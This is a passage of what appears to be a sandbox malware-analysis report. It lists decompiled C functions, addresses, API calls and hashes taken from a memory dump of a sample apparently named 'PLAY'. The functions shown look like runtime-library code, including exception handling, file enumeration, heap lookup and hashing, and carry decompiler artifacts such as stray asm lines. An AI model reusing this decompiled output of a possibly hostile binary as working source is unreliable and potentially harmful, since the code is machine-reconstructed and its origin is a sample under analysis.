				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00B006A7(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E00B00613(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}
























          0x00b0224b
          0x00b02252
          0x00b02257
          0x00b0225d
          0x00b02260
          0x00b02266
          0x00b0226b
          0x00b02270
          0x00b02270
          0x00b02276
          0x00b0227b
          0x00b02280
          0x00b02280
          0x00b02287
          0x00b0228c
          0x00b02291
          0x00b02291
          0x00b02298
          0x00b0229d
          0x00b022a2
          0x00b022a2
          0x00b022a9
          0x00b022ae
          0x00b022b3
          0x00b022b3
          0x00b022bb
          0x00b022cb
          0x00b022dd
          0x00b022ef
          0x00b02302
          0x00b02314
          0x00b0231c
          0x00b02321
          0x00b02326
          0x00b02326
          0x00b0232d
          0x00b02332
          0x00b02332
          0x00b02339
          0x00b0233e
          0x00b0233e
          0x00b02345
          0x00b0234a
          0x00b0234a
          0x00b02351
          0x00b02356
          0x00b02356
          0x00b02360
          0x00b02362
          0x00b0239c
          0x00b02364
          0x00b02369
          0x00b0238d
          0x00b02395
          0x00b02389
          0x00b02389
          0x00b0239f
          0x00b023a6
          0x00b023a8
          0x00b023ca
          0x00b023d2
          0x00b023d5
          0x00b023d5
          0x00b023d7
          0x00b023d7
          0x00b023e2
          0x00b023e8
          0x00b023ed
          0x00b023f4
          0x00b0242e
          0x00b02439
          0x00b0243f
          0x00b02442
          0x00b02445
          0x00b02451
          0x00b02459
          0x00b023f6
          0x00b023f9
          0x00b02405
          0x00b0240b
          0x00b02411
          0x00b02414
          0x00b0241d
          0x00b0241d
          0x00b0245c
          0x00b0246a
          0x00b02470
          0x00b02473
          0x00b02478
          0x00b0247a
          0x00b0247d
          0x00b0247d
          0x00b02482
          0x00b02484
          0x00b02487
          0x00b02487
          0x00b0248c
          0x00b0248e
          0x00b02491
          0x00b02491
          0x00b02496
          0x00b02498
          0x00b0249b
          0x00b0249b
          0x00b024a0
          0x00b024a2
          0x00b024a2
          0x00b024af
          0x00b024b2
          0x00b024e9
          0x00b024b4
          0x00b024b4
          0x00b024b7
          0x00b024e2
          0x00b024d7
          0x00b024d7
          0x00b024eb
          0x00b024f3
          0x00b024f6
          0x00b02515
          0x00b0251a
          0x00b0251a
          0x00b0251c
          0x00b02521
          0x00b0252d
          0x00b02523
          0x00b02526
          0x00b02526
          0x00b02532
          0x00b02532
          0x00b024f8
          0x00b024fb
          0x00b0250a
          0x00000000
          0x00b0250a
          0x00b024fd
          0x00b02500
          0x00b02502
          0x00b02502
          0x00000000
          0x00b02500
          0x00b024b9
          0x00b024bc
          0x00b024d2
          0x00000000
          0x00b024d2
          0x00b024c1
          0x00b024c3
          0x00b024c3
          0x00b024c1
          0x00000000
          0x00b024b2
          0x00b023af
          0x00b023bd
          0x00b023c5
          0x00000000
          0x00b023c5
          0x00b023b3
          0x00b023b8
          0x00b023b8
          0x00000000
          0x00b023b3
          0x00b02370
          0x00b0237e
          0x00b02386
          0x00000000
          0x00b02386
          0x00b02374
          0x00b02379
          0x00b02379
          0x00b02374

          APIs
          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B02238,?,?,00000008,?,?,00B01ED0,00000000), ref: 00B0246A
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ExceptionRaise
          • String ID:
          • API String ID: 3997070919-0
          • Opcode ID: 221e5178eed402e06a0dbf47c43992ee58b1492dad19193a36345c08ffd4890c
          • Instruction ID: a06989090e4bcfac0d14c35fed17ec2feeaab66855558b2a1562d31e643c03cc
          • Opcode Fuzzy Hash: 221e5178eed402e06a0dbf47c43992ee58b1492dad19193a36345c08ffd4890c
          • Instruction Fuzzy Hash: D6B128316106098FDB19CF28C48AA687FE0FF45364F258698E99ACF2E1C335E995CB44
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFC6C9 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
          Download Yara Rule
          C-Code - Quality: 69%
          			E00AFC6C9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v28;
				signed short* _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				signed int _v616;
				signed int _v620;
				intOrPtr _v648;
				intOrPtr _t42;
				void* _t47;
				signed int _t50;
				signed char _t52;
				intOrPtr* _t58;
				union _FINDEX_INFO_LEVELS _t60;
				int _t65;
				void* _t80;
				void* _t82;
				void* _t86;
				WCHAR* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr _t95;
				intOrPtr* _t98;
				void* _t103;
				void* _t111;
				signed short* _t112;
				signed int _t118;
				intOrPtr* _t122;
				intOrPtr _t125;
				void* _t127;
				void* _t132;
				signed int _t133;
				void* _t134;

				_push(__ecx);
				_t92 = _a4;
				_push(__ebx);
				_push(__edi);
				_t2 = _t92 + 2; // 0x2
				_t111 = _t2;
				do {
					_t42 =  *_t92;
					_t92 = _t92 + 2;
				} while (_t42 != 0);
				_t118 = _a12;
				_t95 = (_t92 - _t111 >> 1) + 1;
				_v8 = _t95;
				if(_t95 <=  !_t118) {
					_push(__esi);
					_t5 = _t118 + 1; // 0x1
					_t86 = _t5 + _t95;
					_t125 = E00AFC42C(_t95, _t86, 2);
					if(_t118 == 0) {
						L7:
						_push(_v8);
						_t86 = _t86 - _t118;
						_t47 = E00AFC421(_t125 + _t118 * 2, _t86, _a4);
						_t133 = _t132 + 0x10;
						if(_t47 != 0) {
							goto L12;
						} else {
							_t122 = _a16;
							_t89 = E00AFC913(_t122);
							if(_t89 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t122 + 4)))) = _t125;
								 *((intOrPtr*)(_t122 + 4)) =  *((intOrPtr*)(_t122 + 4)) + 4;
								_t89 = 0;
							} else {
								E00AFC2CE(_t125);
							}
							E00AFC2CE(0);
							_t80 = _t89;
							goto L4;
						}
					} else {
						_push(_t118);
						_t82 = E00AFC421(_t125, _t86, _a8);
						_t133 = _t132 + 0x10;
						if(_t82 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00AFA43F();
							asm("int3");
							_t131 = _t133;
							_t134 = _t133 - 0x264;
							_t50 =  *0xb0b004; // 0x700d25f7
							_v48 = _t50 ^ _t133;
							_t112 = _v32;
							_t98 = _v28;
							_push(_t86);
							_t87 = _v36;
							_v648 = _t98;
							_push(_t125);
							_push(_t118);
							if(_t112 != _t87) {
								while(E00AFC8EF( *_t112 & 0x0000ffff) == 0) {
									_t112 = _t112 - 2;
									if(_t112 != _t87) {
										continue;
									}
									break;
								}
								_t98 = _v612;
							}
							_t126 =  *_t112 & 0x0000ffff;
							if(( *_t112 & 0x0000ffff) != 0x3a || _t112 ==  &(_t87[1])) {
								_t52 = E00AFC8EF(_t126);
								asm("sbb eax, eax");
								_t119 = 0;
								_v616 =  ~(_t52 & 0x000000ff) & (_t112 - _t87 >> 0x00000001) + 0x00000001;
								_t127 = FindFirstFileExW(_t87, 0,  &_v604, 0, 0, 0);
								_t58 = _v612;
								if(_t127 != 0xffffffff) {
									_v620 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
									_t103 = 0x2e;
									do {
										if(_v604.cFileName != _t103 || _v558 != _t119 && (_v558 != _t103 || _v556 != _t119)) {
											_push(_t58);
											_t60 = E00AFC6C9(_t87, _t103, _t119, _t127,  &(_v604.cFileName), _t87, _v616);
											_t134 = _t134 + 0x10;
											if(_t60 != 0) {
												_t119 = _t60;
											} else {
												goto L28;
											}
										} else {
											goto L28;
										}
										L32:
										FindClose(_t127);
										goto L33;
										L28:
										_t65 = FindNextFileW(_t127,  &_v604);
										_t58 = _v612;
										_t103 = 0x2e;
									} while (_t65 != 0);
									_t116 =  *_t58;
									_t106 = _v620;
									_t68 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
									if(_v620 !=  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2) {
										E00AFF2E0(_t87, _t119, _t127, _t116 + _t106 * 4, _t68 - _t106, 4, E00AFC489);
									}
									goto L32;
								} else {
									_push(_t58);
									_t119 = E00AFC6C9(_t87,  &_v605, 0, _t127, _t87, 0, 0);
								}
								L33:
							} else {
								_push(_t98);
								E00AFC6C9(_t87, _t98, 0, _t126, _t87, 0, 0);
							}
							return E00AF7B30(_v12 ^ _t131);
						} else {
							goto L7;
						}
					}
				} else {
					_t80 = 0xc;
					L4:
					return _t80;
				}
			}










































          0x00afc6ce
          0x00afc6cf
          0x00afc6d2
          0x00afc6d3
          0x00afc6d6
          0x00afc6d6
          0x00afc6d9
          0x00afc6d9
          0x00afc6dc
          0x00afc6df
          0x00afc6e4
          0x00afc6ed
          0x00afc6f0
          0x00afc6f5
          0x00afc6fe
          0x00afc6ff
          0x00afc702
          0x00afc70c
          0x00afc712
          0x00afc726
          0x00afc726
          0x00afc729
          0x00afc733
          0x00afc738
          0x00afc73d
          0x00000000
          0x00afc73f
          0x00afc73f
          0x00afc749
          0x00afc74d
          0x00afc75b
          0x00afc75d
          0x00afc761
          0x00afc74f
          0x00afc750
          0x00afc755
          0x00afc765
          0x00afc76b
          0x00000000
          0x00afc76d
          0x00afc714
          0x00afc714
          0x00afc71a
          0x00afc71f
          0x00afc724
          0x00afc770
          0x00afc772
          0x00afc773
          0x00afc774
          0x00afc775
          0x00afc776
          0x00afc777
          0x00afc77c
          0x00afc780
          0x00afc782
          0x00afc788
          0x00afc78f
          0x00afc792
          0x00afc795
          0x00afc798
          0x00afc799
          0x00afc79c
          0x00afc7a2
          0x00afc7a3
          0x00afc7a6
          0x00afc7a8
          0x00afc7bb
          0x00afc7c0
          0x00000000
          0x00000000
          0x00000000
          0x00afc7c0
          0x00afc7c2
          0x00afc7c2
          0x00afc7c8
          0x00afc7ce
          0x00afc7f1
          0x00afc800
          0x00afc802
          0x00afc809
          0x00afc81e
          0x00afc820
          0x00afc829
          0x00afc848
          0x00afc84e
          0x00afc84f
          0x00afc856
          0x00afc873
          0x00afc882
          0x00afc887
          0x00afc88c
          0x00afc8d5
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00afc8d7
          0x00afc8d8
          0x00000000
          0x00afc88e
          0x00afc896
          0x00afc8a0
          0x00afc8a6
          0x00afc8a6
          0x00afc8a9
          0x00afc8ae
          0x00afc8b6
          0x00afc8bb
          0x00afc8cb
          0x00afc8d0
          0x00000000
          0x00afc82b
          0x00afc82b
          0x00afc837
          0x00afc837
          0x00afc8de
          0x00afc7d7
          0x00afc7d7
          0x00afc7dd
          0x00afc7e2
          0x00afc8ee
          0x00000000
          0x00000000
          0x00000000
          0x00afc724
          0x00afc6f7
          0x00afc6f9
          0x00afc6fa
          0x00afc6fd
          0x00afc6fd

          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 53f485ef3ab0406d8bf8b4ba73cc590e7c1d0723dae8bcb0a3b894b9013ce11c
          • Instruction ID: 33f1add603748b835a018cc0b632b53acfb56cd9b7b8ca289e855a8ce9caedc9
          • Opcode Fuzzy Hash: 53f485ef3ab0406d8bf8b4ba73cc590e7c1d0723dae8bcb0a3b894b9013ce11c
          • Instruction Fuzzy Hash: 4A31D47290021D6FCB24EFAACD89DBBB7B9EB84320F004159FA05D7240EA30AD40CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFE483 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFE483() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xb0d568 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




          0x00afe483
          0x00afe48b
          0x00afe493

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: HeapProcess
          • String ID:
          • API String ID: 54951025-0
          • Opcode ID: 0b2acae5f9f4e5b19f929768ce18122f53492f44bc8a513236c57f4f8e49116d
          • Instruction ID: 8bbb3b7e70fdf7911bbeb8f431c95c0afc2becf69c9c7e5c95dbcf9421355c62
          • Opcode Fuzzy Hash: 0b2acae5f9f4e5b19f929768ce18122f53492f44bc8a513236c57f4f8e49116d
          • Instruction Fuzzy Hash: 03A011B02002008FE3008F30AE882083AA8AA2028030A8028AA08C30A0EF2080A8EA00
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEF580 Relevance: .2, Instructions: 187COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 80%
          			E00AEF580(intOrPtr __ecx, unsigned int __edx, signed int _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				unsigned int _v36;
				void* _t86;
				signed int _t87;
				signed int _t95;
				unsigned int _t105;
				signed int _t106;
				signed int _t114;
				signed int _t121;
				signed int _t155;
				signed char* _t161;
				signed int _t167;
				intOrPtr _t173;
				signed int _t206;
				unsigned int _t210;
				void* _t212;

				_t108 = __ecx;
				_v8 = __ecx;
				_t212 = 0;
				_v36 = __edx;
				_t210 = __edx;
				if(__ecx != 0) {
					if(__edx < 0x10) {
						_t86 = _a4 + 0x165667b1;
					} else {
						_t106 = _a4;
						_t5 = _t106 + 0x24234428; // 0x24234429
						_v28 = _t5;
						_t7 = _t106 + 0x61c8864f; // 0x61c88650
						_t95 = _t7;
						_t8 = _t106 - 0x7a143589; // -2048144776
						_v24 = _t8;
						_v12 = __ecx + 3;
						_v16 = __ecx + 2;
						_t173 = _v12;
						_v20 = __ecx + 1;
						_v32 = __edx >> 4;
						do {
							_t210 = _t210 - 0x10;
							asm("rol edx, 0xd");
							_v28 = (_v28 - (((( *(_t173 + _t212) & 0x000000ff) << 0x00000008 |  *(_v16 + _t212) & 0x000000ff) << 0x00000008 |  *(_v20 + _t212) & 0x000000ff) << 0x00000008 |  *(_t212 + _v8) & 0x000000ff) * 0x7a143589) * 0x9e3779b1;
							_t31 = _t212 + 4; // 0xe58b5b5e
							asm("rol edx, 0xd");
							_v24 = (_v24 - (((( *(_v12 + _t212 + 4) & 0x000000ff) << 0x00000008 |  *(_v16 + _t31) & 0x000000ff) << 0x00000008 |  *(_v20 + _t212 + 4) & 0x000000ff) << 0x00000008 |  *(_t212 + _v8 + 4) & 0x000000ff) * 0x7a143589) * 0x9e3779b1;
							_t45 = _t212 + 8; // 0xccccc35d
							asm("rol ebx, 0xd");
							_t106 = (_t106 - (((( *(_v12 + _t212 + 8) & 0x000000ff) << 0x00000008 |  *(_v16 + _t45) & 0x000000ff) << 0x00000008 |  *(_v20 + _t212 + 8) & 0x000000ff) << 0x00000008 |  *(_t212 + _v8 + 8) & 0x000000ff) * 0x7a143589) * 0x9e3779b1;
							_t57 = _t212 + 0xc; // 0xcccccccc
							_t206 = ((( *(_v12 + _t212 + 0xc) & 0x000000ff) << 0x00000008 |  *(_v16 + _t57) & 0x000000ff) << 0x00000008 |  *(_v20 + _t212 + 0xc) & 0x000000ff) << 8;
							_t155 =  *(_t212 + _v8 + 0xc) & 0x000000ff;
							_t212 = _t212 + 0x10;
							_t173 = _v12;
							asm("rol eax, 0xd");
							_t95 = (_t95 - (_t206 | _t155) * 0x7a143589) * 0x9e3779b1;
							_t65 =  &_v32;
							 *_t65 = _v32 - 1;
						} while ( *_t65 != 0);
						_t108 = _v8;
						asm("ror eax, 0xe");
						asm("rol ebx, 0xc");
						asm("rol edx, 0x7");
						asm("rol edx, 1");
						_t86 = _t95 + _t106 + _v24 + _v28;
					}
					_t87 = _t86 + _v36;
					if(_t210 >= 4) {
						_t105 = _t210 >> 2;
						while(1) {
							_t210 = _t210 - 4;
							_t167 = ((( *(_t108 + _t212 + 3) & 0x000000ff) << 0x00000008 |  *(_t108 + _t212 + 2) & 0x000000ff) << 0x00000008 |  *(_v8 + _t212 + 1) & 0x000000ff) << 8;
							_t121 =  *(_v8 + _t212) & 0x000000ff;
							_t212 = _t212 + 4;
							asm("ror eax, 0xf");
							_t87 = (_t87 - (_t167 | _t121) * 0x3d4d51c3) * 0x27d4eb2f;
							_t105 = _t105 - 1;
							if(_t105 == 0) {
								goto L11;
							}
							_t108 = _v8;
						}
					}
					L11:
					if(_t210 != 0) {
						_t161 = _v8 + _t212;
						do {
							_t114 =  *_t161 & 0x000000ff;
							_t161 =  &(_t161[1]);
							asm("rol ecx, 0xb");
							_t87 = (_t114 * 0x165667b1 + _t87) * 0x9e3779b1;
							_t210 = _t210 - 1;
						} while (_t210 != 0);
					}
				} else {
				}
				asm("ror dword [ebx-0x333ca21b], 0xcc");
			}

























          0x00aef580
          0x00aef589
          0x00aef58c
          0x00aef58e
          0x00aef592
          0x00aef596
          0x00aef5b7
          0x00aef72a
          0x00aef5bd
          0x00aef5bd
          0x00aef5c0
          0x00aef5c6
          0x00aef5c9
          0x00aef5c9
          0x00aef5cf
          0x00aef5d5
          0x00aef5db
          0x00aef5e2
          0x00aef5e5
          0x00aef5e8
          0x00aef5f0
          0x00aef5f3
          0x00aef5f7
          0x00aef62c
          0x00aef635
          0x00aef643
          0x00aef672
          0x00aef67b
          0x00aef689
          0x00aef6b5
          0x00aef6b8
          0x00aef6c9
          0x00aef6e0
          0x00aef6e3
          0x00aef6e8
          0x00aef6f3
          0x00aef6f8
          0x00aef6fb
          0x00aef701
          0x00aef701
          0x00aef701
          0x00aef70e
          0x00aef711
          0x00aef714
          0x00aef717
          0x00aef721
          0x00aef723
          0x00aef723
          0x00aef72f
          0x00aef735
          0x00aef739
          0x00aef743
          0x00aef748
          0x00aef765
          0x00aef768
          0x00aef76c
          0x00aef779
          0x00aef77c
          0x00aef782
          0x00aef785
          0x00000000
          0x00000000
          0x00aef740
          0x00aef740
          0x00aef743
          0x00aef787
          0x00aef78a
          0x00aef78f
          0x00aef791
          0x00aef791
          0x00aef794
          0x00aef79f
          0x00aef7a2
          0x00aef7a8
          0x00aef7a8
          0x00aef791
          0x00aef598
          0x00aef5a8
          0x00aef7cf

          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1aff1355eab29e227f9870f6bd8cdd25efe157c35924d3cdcd58bce4f4b85957
          • Instruction ID: 3c4503c24044f35065facead4f8ff741efcf664d5b95b11b49bd01e92fa964de
          • Opcode Fuzzy Hash: 1aff1355eab29e227f9870f6bd8cdd25efe157c35924d3cdcd58bce4f4b85957
          • Instruction Fuzzy Hash: 8C711770F046654BDB0CCA5EC9A507CBFF3EBC6204764C5AED4A6EB689C9359B02CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFD3FB Relevance: .0, Instructions: 22COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFD3FB(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00AFE19D(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






          0x00afd408
          0x00afd40a
          0x00afd40d
          0x00afd410
          0x00afd413
          0x00afd424
          0x00afd426
          0x00afd415
          0x00afd419
          0x00afd422
          0x00000000
          0x00000000
          0x00afd422
          0x00afd42b

          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b9542621f6d6182f4b3b3ca3695b064a9909051c9352017ce4341655b52c96cf
          • Instruction ID: 20479d844f9b2dd29d15898329d943d66037d6922c8a953aea55cd1dda8f6d61
          • Opcode Fuzzy Hash: b9542621f6d6182f4b3b3ca3695b064a9909051c9352017ce4341655b52c96cf
          • Instruction Fuzzy Hash: DBE08C3291122CEBCB15DBC8CA049AAF3FDEB45B42B110096F605D3111C274EE00CBD0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFDD02 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFDD02(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xb0b640) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00AFC2CE(_t46);
							E00AFD8B1( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00AFC2CE(_t47);
							E00AFD9AF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00AFC2CE( *((intOrPtr*)(_t74 + 0x7c)));
						E00AFC2CE( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00AFC2CE( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00AFC2CE( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00AFC2CE( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00AFC2CE( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00AFDE73( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xb0b118) {
						_t31 =  *_t70;
